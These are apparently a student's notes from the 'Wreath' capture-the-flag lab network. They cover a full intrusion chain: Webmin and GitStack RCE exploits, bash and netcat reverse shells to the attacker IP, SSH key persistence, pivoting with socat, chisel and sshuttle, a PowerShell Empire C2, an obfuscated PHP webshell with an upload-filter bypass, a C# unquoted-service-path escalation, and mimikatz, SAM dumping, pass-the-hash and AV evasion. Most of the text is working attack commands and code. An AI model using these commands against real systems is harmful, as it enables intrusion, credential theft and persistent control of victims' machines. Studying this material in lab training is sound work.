MY IP : 10.50.86.

34
First webserver: 10.200.85.200
https://github.com/andrew-d/static-binaries -- static binaries
https://github.com/ernw/static-toolbox/releases/download/1.04/nmap-7.80SVN-x86_64-
a36a34aa6-portable.zip -- nmap static
https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-
scanner/
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done --
ping bash 1 liner
for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i
is open; done -- port scan bash 1 liner
https://github.com/MuirlandOracle/C-Sharp-Port-Scan -- C# port scanner
https://github.com/MuirlandOracle/CPP-Port-Scanner -- C++ port scanner

nmap -A 10.200.85.200 -p1-15000 -oA initial_scan_wreath -v

echo "10.200.85.200 thomaswreath.thm" >> /etc/hosts

FIRST MACHINE
---------------------------------------------------------------------
Find werserver on port 10000 MiniServ 1.890 (Webmin httpd) vulnerable to RCE CVE-
2019-15107
Use exploit https://github.com/MuirlandOracle/CVE-2019-15107
Download exploit and install requirements cd CVE-2019-15107 && pip3 install -r
requirements.txt
Execute script to get shell on the webserver as root
setup listener as rlwrap -cAr nc -lvnp 4444
/bin/sh -i >& /dev/tcp/10.50.86.34/4444 0>&1 -- on victim
root password hash
$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq
6/6g0PxK9VqSdy47/qKXad1
we cannot crack the password
but since ssh is open we can copy the ssh keys and use those to login again to the
server
copy the keys and set chmod to 600 for keys to work
OR
add my own public key to authorized_keys on victim so we can easily login without
any password and simply ssh
chattr -i authorized_keys --- if issue with modifying file use change attribute
command
------------------------------------------------------------------------
THEORY
------------------------------------------------------------------------
Tunnelling/Proxying: Creating a proxy type connection through a compromised machine
in order to route all desired traffic into the targeted network. This could
potentially also be tunnelled inside another protocol (e.g. SSH tunnelling), which
can be useful for evading a basic Intrusion Detection System (IDS) or firewall
Port Forwarding: Creating a connection between a local port and a single port on a
target, via a compromised host

Initial enum for pivot

arp -a
/etc/hosts
/etc/resolv.conf
nmcli dev show
C:\Windows\System32\drivers\etc\hosts
ipconfig /all
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done --
ping bash 1 liner
for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i
is open; done -- port scan bash 1 liner

PROXYCHAINS
When creating a proxy we open up a port on our own attacking machine which is
linked to the compromised server, giving us access to the target network.
Proxychains is a command line tool which is activated by prepending the command
proxychains to other commands. For example, to proxy netcat through a proxy
Master config file -- /etc/proxychains.conf
ORDER OF SEARCH FOR CONFIG FILE
The current directory (i.e. ./proxychains.conf)
~/.proxychains/proxychains.conf
/etc/proxychains.conf
set socks4 port to desiered port and comment proxy_dns uing # to use nmap
proxychains nmap -sT 10.200.85.150 -p1-500 -Pn

FOXYPROXY
For proxying web traffic

PORT FORWARD
e.g. if ssh server 172.15.0.5 can connect to webserver 172.16.0.10 but we cannot,
then use
ssh -L 8000:172.16.0.10:80 [email protected] -fN -- now connect to localhost:8000 it
will route traffic through ssh server to the webserver

PROXY
ssh -D 1337 user@ssh_server -fN -- routes all our traffic on port 1337 through the
ssh server to the target network. Set this port up in proxychains and now use
commands with proxychains to proxy all tools through the ssh server.

REVERSE
-------------
if we have shell on target and it has ssh client but not server
ssh-keygen -- on attack machine
copy content of .pub to ~/.ssh/authorized_keys
command="echo 'This account can only be used for port forwarding'",no-agent-
forwarding,no-x11-forwarding,no-pty
paste this line before our public key. This tells that only forwarding is allowed,
no shell.
restart ssh on our machine

Now again suppose we have one compromised machine (ssh client) and target webserver
reachable by the compromised machine.
use this command on the compromised machine
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN
ssh my_port:webserver_ip:webserver_port user@me_attacker_ip -i id_rsa -fn
ssh -R 8000:172.16.0.10:80 [email protected] -i KEYFILE -fN
now if we connect to our localhost:8000 it will be redirected to the target
webserver

REVERSE PROXY
ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN -- open up a proxy allowing us to
redirect all of our traffic through localhost port 1337, into the target network.

PLINK.EXE
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
/usr/share/windows-resources/binaries/plink.exe -- also here
windows cli putty ssh client
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT
USERNAME@ATTACKING_IP -i KEYFILE -N --- reverse proxy using plink.exe
E.g. compromised machine 172.16.0.5, target server 172.16.0.10:80, attack IP
172.16.0.20
Execute on compromised host
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 USERNAME@ATTACKING_IP -i
KEYFILE -N

ssh-keygen keys do not work with plink

install puttygen using 'sudo apt install putty-tools'
puttygen KEYFILE -o OUTPUT_KEY.ppk -- this ppk file will we usable by plink.exe

SOCAT
https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
https://sourceforge.net/projects/unix-utils/files/socat/1.7.3.2/socat-1.7.3.2-1-
x86_64.zip/download
Good for relay

SOCAT REVERSE SHELL RELAY

transfer socat and nc to victim
on attacker set -- nc -lvp 443
on victim run -- socat tcp-l:8000 tcp:attacker:443 &
now if we connect from any machine to compromised host on port 8000, it will relay
the shell to the attacker
e.g. nc ip_compromised 8000 -e /bin/bash -- this will automatically relay the
connection back to attacker on 443

SOCAT PORT FORWARD -- EASY METHOD -- OPENS PORT ON COMPROMISED HOST

setup listen port on compromised host and forward traffic received to target server
e.g. if we want to connect to a target server on the network with mysql service
open
socat tcp-l:33060,fork,reuseaddr tcp:target_server:3306 & -- fork treats each
connection as separate process and reuseaddr keeps port open after connection is
made

SOCAT PORT FORWARD -- QUIET METHOD -- DOES NOT OPEN PORT ON COMPROMISED HOST
on attacker -- socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
on victim -- socat tcp:attack_ip:8001 tcp:target_ip:port,fork &
e.g.
./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &
if we localhost:8000, the traffic will reach the target through the relay

to kill the cats,

jobs
kill %NUMBER

CHISEL
https://github.com/jpillora/chisel/releases
For easy proxy and port forwarding without ssh
2 modes -- client and server
chisel client|server -- help
chisel client --help
Usage: chisel client [options] <server> <remote> [remote] [remote] ...

<server> is the URL to the chisel server.

 <remote>s are remote connections tunneled through the server, each of
which come in the form:

<local-host>:<local-port>:<remote-host>:<remote-port>/<protocol>

■ local-host defaults to 0.0.0.0 (all interfaces).

■ local-port defaults to remote-port.
■ remote-port is required*.
■ remote-host defaults to 0.0.0.0 (server localhost).
■ protocol defaults to tcp.

which shares <remote-host>:<remote-port> from the server to the client

as <local-host>:<local-port>, or:

R:<local-interface>:<local-port>:<remote-host>:<remote-port>/<protocol>

which does reverse port forwarding, sharing <remote-host>:<remote-port>

from the client to the server's <local-interface>:<local-port>.

When the chisel server has --socks5 enabled, remotes can

specify "socks" in place of remote-host and remote-port.
The default local host and port for a "socks" remote is
127.0.0.1:1080. Connections to this remote will terminate
at the server's internal SOCKS5 proxy.

When the chisel server has --reverse enabled, remotes can

be prefixed with R to denote that they are reversed. That
is, the server will listen and accept connections, and they
will be proxied through the client which specified the remote.
Reverse remotes specifying "R:socks" will listen on the server's
default socks port (1080) and terminate the connection at the
client's internal SOCKS5 proxy.

CHISEL REVERSE SOCKS PROXY

connects back from compromised to attacker
./chisel server -p listen_port --reverse & --- on attacker , proxy specified by
connecting/compromised host

./chisel client attack_ip:listen_port R:socks & -- on compromised host

proxy will open on 127.0.0.1:1080

CHISEL FORWARD SOCKS PROXY -- if we cannot directly reach server e.g. if inbound is
blocked fot double pivot
./chisel sever -p Listen_port --socks5 -- on compromised host

./chisel client target_ip:target_port proxy_port:socks -- on attacker, this will

connect to chisel server on target_port and socks proxy will open on proxy_port
e.g. ./chisel client 172.16.0.10:8080 1080:socks

NOTE: for both chisel proxies change proxychains socks4a to socks5 and port 1080
recommended, for forward proxy we will chhose the port in command

CHISEL REMOTE PORT FORWARD

A remote port forward is when we connect back from a compromised target to create
the forward.
./chisel server -p LISTEN_PORT --reverse & -- on attacker
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT & ---
on target
Here the LISTEN_PORT is the port that we started the chisel server on, and the
LOCAL_PORT is the port we wish to open on our own attacking machine to link with
the desired target port.
e.g.
attack .20, compromise .5 and target .10:22
./chisel server -p 1337 --reverse &
./chisel client .20:1337 R:2222:.10:22 &
now connect to 127.0.0.1:2222 to gain access to forwarded port

CHISEL LOCAL PORT FORWARD

./chisel server -p LISTEN_PORT -- on compromised host
./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT -- on
attacker

For example, to connect to 172.16.0.5:8000 (the compromised host running a chisel

server), forwarding our local port 2222 to 172.16.0.10:22 (our intended target), we
could use:
./chisel client 172.16.0.5:8000 2222:172.16.0.10:22

SSHUTTLE
Only with Linux Targets
sshuttle -r user@compromise subnet
e.g.
sshuttle -r [email protected] 172.16.0.0/24
sshuttle -r username@address -N -- can also run -N to auto detect subnet -- not
always successful
add & to background the commands

if key based authentication is supported use

sshuttle -r user@address --ssh-cmd "ssh -i KEYFILE" SUBNET

if connection breaks remember to add the first compromised server with -x e.g.
sshuttle -r [email protected] 172.16.0.0/24 -x 172.16.0.5

THEORY SUMMARY
Proxychains and FoxyProxy are used to access a proxy created with one of the other
tools
SSH can be used to create both port forwards, and proxies
plink.exe is an SSH client for Windows, allowing you to create reverse SSH
connections on Windows
Socat is a good option for redirecting connections, and can be used to create port
forwards in a variety of different ways
Chisel can do the exact same thing as with SSH portforwarding/tunneling, but
doesn't require SSH access on the box
sshuttle is a nicer way to create a proxy when we have SSH access on a target
---------------------------------------------------------------------------------
ENUMERATION FROM COMPROMISED SERVER
---------------------------------------------------------------------------------
copy nmap binary and scan the subnet
found .100 and .150 as alive hosts
Nmap scan report for ip-10-200-85-150.eu-west-1.compute.internal (10.200.85.150)
Host is up (0.00048s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open epmap
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
15997/tcp open unknown
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49675/tcp open unknown
MAC Address: 02:42:D5:22:E3:B3 (Unknown)
---------------------------------------
PIVOTING
---------------------------------------
WAYS OF ACCESSING THE INTERNAL SITE
ssh -L 4444:10.200.85.150:80 [email protected] -fN -- SSH LOCAL PORT FORDWARDING
-- now go to localhost 4444 and the site will work

FOR SSH REVERSE PORT FORWARD our ssh should be in authorized of victim. then on
victim run
ssh -R 8000:10.200.85.100:80 root10.50.86.34 -- now localhost:8000 and it will open
site again

FOR SSH dynamic port fordwarding

ssh -D 1337 [email protected] -- set socks4 port as 1337 in proxchains conf file.
Now use proxychains to access the URL and it will work as intended.

FOR SOCAT PORT FORWARD

socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & -- on attacker
socat tcp:10.50.86.34:8001 tcp:10.200.85.150:80,fork & -- on victim
now localhost:8000 -- and traffic will reach .150 on port 80

FOR CHISEL REVERSE PROXY

./chisel server -p 1337 --reverse -- on attacker
./chisel client 10.50.86.34:1337 R:socks & -- compromised host
now we will get message on server that proxy is on 1080, so we edit our proxycahins
file
now we can easily use proxychains url targetsite and we will be successful

sshuttle for initial access into the network -- best for directly interacting but
not good for nmap
sshuttle -r [email protected] 10.200.85.0/24 -x 10.200.85.200

now open the http link of .150

found error on page
found /gitstack link, default credentils did not work
searchsploit gitstack -- found rce
searchsploit -m 43777 -- use -m to copy exploit to current directory
since we are on linux use dos2unix 43777.py to remove any line errors
check if exploit is python 2 or 3 -- easy check if print has () then it is 3
alter target ip in exploit and change exploit.php to exploit-name.php to avoid
problems for other users
now either we can keep changing the command in the script or better use curl e.g.
curl -X POST http://10.200.85.150/web/exploit-sundeel.php -d "a=whoami"
we can change a= to any command we want
e.g. we can use ping command to see if the 2nd victim can reach our attacker IP
directly
we can also start tcpdump on our machine to wait to incoming traffic tcpdump -i
tun0 icmp

our .200 is centos which has a very restrictive firewall as we while while trying
out different payloads before
to open a specfic relay port we use the command
firewall-cmd --zone=public --add-port PORT/tcp -- zone public means for inbound
connections -- i opened port 31337

next we use powershell reverse shell to gain connect back to .200 host -- (NOT
COPYING PAYLOAD HERE SINCE DEFENDER KEEPS DEFEATING THE FILE)

use BURP inspector to encode the payload so it can transmit over http

Now to route the reverse from the compromised host to our attack machine we set up
a socat relay
on attack machine we use nc -lvp 1337
and on compromised host we use socat tcp-l:31337 tcp:10.50.86.34:1337 &
now when the second victim connects to the first on port 31337 it will
automatically route to our nc listener on port 1337

--------------------------------------------------------------------
STABILISATION AND POST EXPLOITATION
--------------------------------------------------------------------
We know that open ports on .150 include 3389 and 5985(winrm), so we can either rdp
or use winrm, we need a user with either rdp or "remote management users" rights ,,
or we can add our user to Administrators group
since we are nt authority/system we can create our own admin user on the system
net user USERNAME PASSWORD /add
net localgroup Administrators USERNAME /add
net localgroup "Remote Management Users" USERNAME /add -- to work with evil-winrm

Now can login using evil-winrm -- evil-winrm -u sundeel -p sundeel12 -i

10.200.85.150
For RPD we will use xfreerdp
xfreerdp /u:sundeel /p:sundeel12 /cert:ignore /v:10.200.85.150 /dynamic-resolution
+clipboard /drive:<kali dir>,<share name on victim>
a good dir to share is /usr/share/windows-resources
now we run mimikatz using >\\tsclient\sundeel-share\mimikatz\x64\mimikatz.exe
privilege::debug
token::elevate
then dump password hashes -- lsadump::lsa /patch |||| lsadump::sam
from THOMAS has we can find his password using crackstation i<3ruby
Admin Hash: 37db630168e5f82aafa8461e05c6bbd1
We can login as admin usign pass the hash by evil-winrm
evil-winrm -u 'Administrator' -H '37db630168e5f82aafa8461e05c6bbd1' -i
10.200.85.150
-----------------------------------------------------------------------------------
----
COMMAND AND CONTROL
-----------------------------------------------------------------------------------
----
https://www.thec2matrix.com/
Powershell Empire -- now maintained by BC security
Starkiller its GUI
sudo apt install powershell-empire starkiller -- install both
NOW Start Empire Server
sudo powershell-empire server -- wait for server to load
sudo powershell-empire server -- client cli
client will automatically connect to server on localhost
if server is hosted somewhere else then enter in cli
connect HOSTNAME --username=USERNAME --password=PASSWORD
starkiller -- command to start starkiller
empireadmin:password123 -- default credentials

4 MAIN PARTS
Listeners -- listen for a connect back
Stagers -- payloads for reverse shell
Agents -- send commands to remote hosts like sessions in msf
Modules -- facilitate further exploitation

***LISTENERS***
CLI
uselistener <type> -- http type is most common
options -- view options to set for listener
set option <value> -- e.g set name sundeel-http
execute --- starts listener
back -- to go back from this menu
main -- goes to main menu

STARKILLER
Go to listeners >> create >> choose type and set options and it will start
listening

***STAGERS***
CLI
usestager <type> multi/launcher is good, for now we will use multi/bash
set listenr <our listener name>
execute

STARKILLER
Go to stagers >> create >> type multi/bash >> bind to our listener >> and start
now copy stagers payload and save it in a file

***AGENTS***
CLI
once a stager is executed on a victim an agent will start up in empire
agents -- command to see active agents
interact <agent name>
help -- to see which commands we can execute
kill <agent name>

STARKILLER
run stager on victim to get a connect back
it will show in agent window when successful

***HOP LISTENERS*** important for proxying data from machines with no outbound
acess
Here set name
choose host and port for the jumpserver host e.g 10.200.85.200 will be host
RedirectListener -- enter name of normal created http listener
CLI uselistener http_hop
set Host <compromised server>
set Port
run

***Hop Listener Stager***

from listener choose the hop listener
and language as powershell
execute
stager files will be created in /tmp/http_hop
zip all files inside the directory zip -r <outfile>.zip *
send these files to victim
unzip hop.zip -- unzip on victim
now on victim open the port set in hop listener from the firewall
firewall-cmd --zone=public --add-port PORT/tcp
Next since we know that php is installed on the system already we can use it to
host the files with command
php -S 0.0.0.0:PORT &>/dev/null &
python webserver will not execute the php files so thats why we used php built-in
webserver
now on 2nd victim we will run the hop stager powershell script. We can either run
this on the evil-winrm shell or the webshell that we got
once executed we will successfully recieve the agent from the 2nd host which was
not directly accessible

MODULES
CLI
interact <agent>
usemodule <module name> e.g. powershell/privesc/sherlock --checks for privsec on
target
We can see module results directly from agent
OR
go to modules. choose module type >> choose agent >> then see results in reporting
once done

SHELL
from CLI enter shell to use shell on agent
already found in agent settings in Starkiller GUI
-----------------------------------------------------------------------------------
----------
ENUMERATION OF LAST HOST
-----------------------------------------------------------------------------------
----------
we will need to find the last host from the gitserver which we compromised. but
running tools two proxies won't work
since we have a evil-winrm shell on the 2nd target we can use the help of upload
and download capabilities on evil-winrm
upload LOCAL_FILEPATH REMOTE_FILEPATH
download REMOTE_FILEPATH LOCAL_FILEPATH
with evil-winrm we can also set a path to load powershell scripts directly into the
winrm session without needing to upload the scripts on the targets disk
for this we use the -s option e.g.
evil-winrm -u USERNAME -p PASSWORD -i IP -s /opt/scripts
the scripts for empire an collected in
/usr/share/powershell-empire/empire/server/data/module_source/

network scanning sctipts are in

/usr/share/powershell-empire/empire/server/data/module_source/situational_awareness
/network/
Invoke-Portscan.ps1 -- use for portscanning
run evil-winrm as
evil-winrm -u 'Administrator' -H '37db630168e5f82aafa8461e05c6bbd1' -i
10.200.85.150 -s
/usr/share/powershell-empire/empire/server/data/module_source/situational_awareness
/network/

enter script name Invoke-Portscan.ps1 to initialize the script

now we can use get-help invoke-portscan to see the help menu
Invoke-Portscan -Hosts 10.200.85.100 -TopPorts 50 -- will scan top 50 ports on the
host
-----------------------------------------------------------------------------------
------------
2ND PIVOT
-----------------------------------------------------------------------------------
------------
Now we will use pivot to set up a forward proxy on the .150 host so we can proxy
our traffic through it to the .100 host
we will open a port on the windows firewall using cli command netsh
netsh advfirewall firewall add rule name="Chisel-Sundeel" dir=in action=allow
protocol=tcp localport=51337
can also add rule via Powershell
New-NetFirewallRule -DisplayName 'My port' -Profile 'Private' -Direction Inbound -
Action Allow -Protocol TCP -LocalPort 6624
run this in evil-winrm
Now we transfer chisel to the victim from evil-winrm
now to setup forward proxy
./chisel sever -p 51337 --socks5 -- on compromised host

./chisel client 10.200.85.150:51337 1080:socks -- on attacker

now we can use proxychains proxy in browser to open the site on
http://10.200.85.100/
First from host .150 on evil-winrm we download the website.git directory using the
command
download C:\GitStack\repositories\website.git /root/Desktop/git
this will download all sub-dirs inside website.git

now we can use smartgit to clone the local git file and view the most recent commit
we see changes in /resources/index.php file
It will probably ask us for creds
We'll be able to upload image files
There are two filters in play to stop us from uploading other kinds of files
Both of these filters can be bypassedv-- the filter checks removes the extension
and see if it is in good extension. since it checks 1st extension only we can
bypass it by naming file as file.png.php.
2nd since it uses getimagesize we can bypass it by uploading the php code in
comment file with exiftool e.g. exiftool -comment='<?php echo "<pre>Test
Payload</pre>"; die();?>' picture.png
we found thomas password before as i<3ruby
his username from git is twreath and from system was thomas
let us try the credentials
Now we can access
http://10.200.85.100/resources/index.php
http://10.200.85.100/resources/uploads/Screenshot_2022-04-20_17_37_41.png -- image
upload sample path
-----------------------------------------------------------------------------------
------------
AV EVASION
-----------------------------------------------------------------------------------
------------
On-Disk evasion
In-Memory evasion
can use https://www.veil-framework.com/ veil for av evasion
also use https://www.shellterproject.com/

Anti-Malware Scan Interface (AMSI) -- checks scripts executing in memory -- need to

bypass
can use
https://github.com/PwnDexter/SharpEDRChecker
https://github.com/GhostPack/Seatbelt
to find version of AV on system
sample PHP shell code
<?php
$cmd = $_GET["wreath"];
if(isset($cmd)){
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>
now we use php obfuscator https://www.gaijin.at/en/tools/php-obfuscator for evasion
<?php $g0=$_GET[base64_decode('d3JlYXRo')];if(isset($g0)){echo
base64_decode('PHByZT4=').shell_exec($g0).base64_decode('PC9wcmU+');}die();?>
now use \ before $ sign to escape in bash
now upload and we can execute commands using
http://10.200.85.100/resources/uploads/sundeel-shell.png.php?wreath=whoami

for reverse shell we need to upload nc , but defender picks up default nc version.
let us use another version e.g.
git clone https://github.com/int0x33/nc.exe/

we will compile the binaries ourselves

// For x64 compile with: x86_64-w64-mingw32-gcc
// For x86 compile with: i686-w64-mingw32-gcc
change to 64 bit version in makefile and the run command make
now use can use file nc.exe to see that it is compiled for 64 bit system
now we host the file using python
we upload nc to the victim using curl
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
\>>\\
10.200.85.100/resources/uploads/sundeel-shell.png.php?wreath=curl
http://10.50.86.34:8000/nc.exe -o c:\\windows\\temp\\nc-sundeel.exe
my shell was uploaded to xampp directory -- didnot work with temp dk why
IN MY CASE \ SLASHES WORKED
now set up a listener on my machine and execute nc on victim as
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e
cmd.exe
we get a successful connect back
-----------------------------------------------------------------------------------
-----
ENUM OF LAST HOST
-----------------------------------------------------------------------------------
-----
whoami /priv
whoami /groups
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows" |
findstr /v """
we found an unquoted service pathname
sc qc SystemExplorerHelpService
sc query SystemExplorerHelpService
Now use powershell get-acl cmdlet to find permissions on path
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
all users have full control
powershell "get-acl -Path 'C:\Windows\Temp\' | format-list"

now we will drop a exe into the witeable path of the service and tell it to execute
a nc shell to connect to our attacker listener
we will name it Wrapper.cs
install mono to compile c# programs on kali -- sudo apt install mono-devel
*********************************
using System;
using System.Diagnostics;

namespace Wrapper{
class Program{
static void Main(){
Process proc = new Process();
ProcessStartInfo procInfo = new ProcessStartInfo("c:\\xampp\\nc-
sundeel.exe", "10.50.86.34 4999 -e cmd.exe");
procInfo.CreateNoWindow = true;
proc.StartInfo = procInfo;
proc.Start();
}
}
}
*********************************
compile it using mcs Wrapper.cs
Wrapper.exe will be created

Transfer the file using curl again or try smbserver from impacket
smbserver.py share . -smb2support -username user -password password123 -- . means
current dir
python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -
username user -password password123 share .

connect to share from attacker using net use \\ATTACKER_IP\share /USER:user

s3cureP@ssword

net use \\10.50.86.34\share /User:user password123

command successful returned

copy \\10.50.86.34\share\Wrapper.exe %TEMP%\wrapper-sundeel.exe

copy \\10.50.86.34\share\Wrapper.exe C:\xampp\wrapper-sunny.exe

run is see if working fine

net use \\ATTACKER_IP\share /del -- for disconnect

now nopt the file in system explorer directory and name it system.exe

the we use sc stop <service name> to stop the service

and then use
sc start <service name>
while our nc listener is working
and we will get root shell

since mimikatz in on this pc it will get caught so we will copy the sam and system
registry hive to extract passwords
reg.exe save HKLM\SAM sam.bak
reg.exe save HKLM\SYSTEM system.bak
we can then transfer them to our system using the smbserver.py
move sam.bak \\ATTACKING_IP\share\sam.bak

dump hashes with the help of secretsdump.py

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam
PATH/TO/SAM_FILE -system PATH/TO/SYSTEM_FILE LOCAL

OR GET IBFUSCATED MIMIKATZ FROM

https://raw.githubusercontent.com/HernanRodriguez1/MimikatzFUD/main/Invoke-
M1m1fud2.ps1
copy \\10.50.86.34\share\Invoke-M1m1fud2.ps1 C:\xampp\Invoke-M1m1fud2.ps1